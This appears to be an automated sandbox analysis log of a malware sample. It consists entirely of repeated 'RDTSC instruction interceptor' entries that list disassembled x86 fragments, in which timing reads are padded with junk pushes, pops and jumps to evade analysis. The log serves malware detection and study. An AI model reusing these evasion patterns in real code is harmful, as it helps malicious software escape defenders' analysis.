                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D64CBB second address: D64CC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D64CC1 second address: D64CC8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D64CC8 second address: D64CE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FC734E5F781h 0x0000000f jnc 00007FC734E5F776h 0x00000015 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D64CE9 second address: D64CED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D64CED second address: D64CF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D64E39 second address: D64E52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC734882085h 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D64E52 second address: D64E56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D64E56 second address: D64E69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 jp 00007FC734882076h 0x0000000f pop ebx 0x00000010 push esi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D67781 second address: D677B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a add dword ptr [ebp+124490C3h], edx 0x00000010 push 00000000h 0x00000012 mov dword ptr [ebp+122D1CBDh], ebx 0x00000018 push 2C73CFFEh 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FC734E5F785h 0x00000024 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D677B5 second address: D6782D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734882084h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 2C73CF7Eh 0x00000010 mov edi, eax 0x00000012 push 00000003h 0x00000014 adc ecx, 7FD27F96h 0x0000001a push 00000000h 0x0000001c jl 00007FC73488207Ch 0x00000022 sub dword ptr [ebp+122D1C81h], esi 0x00000028 push 00000003h 0x0000002a mov edi, dword ptr [ebp+122D3AB2h] 0x00000030 call 00007FC734882079h 0x00000035 jg 00007FC734882088h 0x0000003b jmp 00007FC734882082h 0x00000040 push eax 0x00000041 push ecx 0x00000042 push eax 0x00000043 push edx 0x00000044 jmp 00007FC734882084h 0x00000049 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D6782D second address: D67842 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e jbe 00007FC734E5F776h 0x00000014 pop esi 0x00000015 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D67842 second address: D6787E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jl 00007FC734882076h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e jp 00007FC73488208Ch 0x00000014 jmp 00007FC734882086h 0x00000019 mov dword ptr [esp+04h], eax 0x0000001d push eax 0x0000001e push edx 0x0000001f jp 00007FC73488207Ch 0x00000025 jng 00007FC734882076h 0x0000002b rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D6796C second address: D67970 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D67970 second address: D67A2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jl 00007FC734882076h 0x0000000d jns 00007FC734882076h 0x00000013 popad 0x00000014 popad 0x00000015 mov dword ptr [esp+04h], eax 0x00000019 jnc 00007FC734882080h 0x0000001f pop eax 0x00000020 push 00000000h 0x00000022 push ebx 0x00000023 call 00007FC734882078h 0x00000028 pop ebx 0x00000029 mov dword ptr [esp+04h], ebx 0x0000002d add dword ptr [esp+04h], 00000018h 0x00000035 inc ebx 0x00000036 push ebx 0x00000037 ret 0x00000038 pop ebx 0x00000039 ret 0x0000003a push 00000003h 0x0000003c mov dword ptr [ebp+122D2C80h], esi 0x00000042 push 00000000h 0x00000044 push 00000000h 0x00000046 push ecx 0x00000047 call 00007FC734882078h 0x0000004c pop ecx 0x0000004d mov dword ptr [esp+04h], ecx 0x00000051 add dword ptr [esp+04h], 0000001Bh 0x00000059 inc ecx 0x0000005a push ecx 0x0000005b ret 0x0000005c pop ecx 0x0000005d ret 0x0000005e mov ecx, dword ptr [ebp+122D3BE2h] 0x00000064 push 00000003h 0x00000066 jns 00007FC734882082h 0x0000006c call 00007FC734882079h 0x00000071 jmp 00007FC734882080h 0x00000076 push eax 0x00000077 push eax 0x00000078 push edx 0x00000079 push eax 0x0000007a push edx 0x0000007b jmp 00007FC73488207Eh 0x00000080 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D67A2D second address: D67A31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D67A31 second address: D67A37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D67A37 second address: D67A69 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734E5F785h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d jp 00007FC734E5F77Eh 0x00000013 jnc 00007FC734E5F778h 0x00000019 mov eax, dword ptr [eax] 0x0000001b push ebx 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D67A69 second address: D67A7E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e jg 00007FC734882076h 0x00000014 pop edi 0x00000015 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D67A7E second address: D67B0D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC734E5F788h 0x00000008 jmp 00007FC734E5F781h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pop eax 0x00000011 push 00000000h 0x00000013 push edi 0x00000014 call 00007FC734E5F778h 0x00000019 pop edi 0x0000001a mov dword ptr [esp+04h], edi 0x0000001e add dword ptr [esp+04h], 00000016h 0x00000026 inc edi 0x00000027 push edi 0x00000028 ret 0x00000029 pop edi 0x0000002a ret 0x0000002b lea ebx, dword ptr [ebp+1244C644h] 0x00000031 jmp 00007FC734E5F789h 0x00000036 xchg eax, ebx 0x00000037 pushad 0x00000038 jmp 00007FC734E5F77Dh 0x0000003d jmp 00007FC734E5F77Dh 0x00000042 popad 0x00000043 push eax 0x00000044 push eax 0x00000045 pushad 0x00000046 push eax 0x00000047 push edx 0x00000048 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D67BD8 second address: D67BDE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D57DAD second address: D57DB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FC734E5F776h 0x0000000a rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D57DB7 second address: D57DBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D57DBB second address: D57DD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jnl 00007FC734E5F776h 0x0000000d push edx 0x0000000e pop edx 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jns 00007FC734E5F776h 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D865C5 second address: D865D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 push esi 0x0000000a pop esi 0x0000000b rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D865D0 second address: D865D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D57D94 second address: D57DA3 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FC734882076h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D57DA3 second address: D57DAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D8689D second address: D868A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D86F69 second address: D86F7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC734E5F77Dh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D86F7F second address: D86F85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D86F85 second address: D86F89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D870F1 second address: D870FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D870FC second address: D87101 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D8728D second address: D87298 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edi 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D87852 second address: D8787F instructions: 0x00000000 rdtsc 0x00000002 jl 00007FC734E5F776h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d jc 00007FC734E5F77Eh 0x00000013 pushad 0x00000014 popad 0x00000015 jo 00007FC734E5F776h 0x0000001b jmp 00007FC734E5F782h 0x00000020 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D8C234 second address: D8C239 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D8C3A3 second address: D8C3EA instructions: 0x00000000 rdtsc 0x00000002 js 00007FC734E5F778h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jmp 00007FC734E5F786h 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 jmp 00007FC734E5F789h 0x0000001b mov eax, dword ptr [eax] 0x0000001d push ebx 0x0000001e push eax 0x0000001f push edx 0x00000020 push edx 0x00000021 pop edx 0x00000022 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D8C3EA second address: D8C40C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734882084h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D8C40C second address: D8C413 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D8C413 second address: D8C419 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D8ACD6 second address: D8ACDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D8ACDA second address: D8ACE8 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jbe 00007FC734882076h 0x0000000e rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D8ACE8 second address: D8ACEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D8C4EC second address: D8C4F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D92C74 second address: D92C7E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007FC734E5F776h 0x0000000a rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D92C7E second address: D92CB8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734882088h 0x00000007 jmp 00007FC73488207Fh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ebx 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 pop ebx 0x00000012 pop edx 0x00000013 pop eax 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 jnl 00007FC734882076h 0x0000001d rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D92CB8 second address: D92CBC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D92CBC second address: D92CD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 jmp 00007FC734882080h 0x0000000e pop edi 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D9680C second address: D96811 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D96811 second address: D96816 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D968B2 second address: D968B7 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D968B7 second address: D968E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 jno 00007FC734882082h 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jo 00007FC734882078h 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D96F30 second address: D96F34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D974AD second address: D974C2 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FC73488207Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edi 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D974C2 second address: D974D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edi 0x00000006 xchg eax, ebx 0x00000007 sbb si, 4817h 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D974D5 second address: D974D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D974D9 second address: D974E3 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FC734E5F776h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D979AD second address: D979B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D97B35 second address: D97B5F instructions: 0x00000000 rdtsc 0x00000002 je 00007FC734E5F778h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e jmp 00007FC734E5F788h 0x00000013 push eax 0x00000014 push edx 0x00000015 push edi 0x00000016 pop edi 0x00000017 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D98A2C second address: D98A32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D98A32 second address: D98A88 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b and esi, 7130E349h 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push ecx 0x00000016 call 00007FC734E5F778h 0x0000001b pop ecx 0x0000001c mov dword ptr [esp+04h], ecx 0x00000020 add dword ptr [esp+04h], 0000001Ah 0x00000028 inc ecx 0x00000029 push ecx 0x0000002a ret 0x0000002b pop ecx 0x0000002c ret 0x0000002d sub edi, dword ptr [ebp+122D3A8Ah] 0x00000033 push 00000000h 0x00000035 mov esi, edi 0x00000037 xchg eax, ebx 0x00000038 pushad 0x00000039 pushad 0x0000003a jmp 00007FC734E5F782h 0x0000003f push eax 0x00000040 push edx 0x00000041 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D98A88 second address: D98A90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D99AE8 second address: D99AED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D99AED second address: D99B52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FC734882076h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e pushad 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push edi 0x00000013 pop edi 0x00000014 popad 0x00000015 jl 00007FC734882078h 0x0000001b pushad 0x0000001c popad 0x0000001d popad 0x0000001e nop 0x0000001f stc 0x00000020 push 00000000h 0x00000022 push 00000000h 0x00000024 push edi 0x00000025 call 00007FC734882078h 0x0000002a pop edi 0x0000002b mov dword ptr [esp+04h], edi 0x0000002f add dword ptr [esp+04h], 0000001Ah 0x00000037 inc edi 0x00000038 push edi 0x00000039 ret 0x0000003a pop edi 0x0000003b ret 0x0000003c jmp 00007FC734882082h 0x00000041 push 00000000h 0x00000043 mov dword ptr [ebp+122D3347h], edx 0x00000049 xchg eax, ebx 0x0000004a push eax 0x0000004b push edx 0x0000004c push eax 0x0000004d push edx 0x0000004e push ecx 0x0000004f pop ecx 0x00000050 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D99B52 second address: D99B58 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D99B58 second address: D99B80 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734882083h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FC73488207Eh 0x00000011 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D99B80 second address: D99B87 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D9A34F second address: D9A353 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D9B067 second address: D9B06B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: D52D8F second address: D52DA1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC73488207Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DA08DC second address: DA08F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734E5F781h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: DA08F6 second address: DA08FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
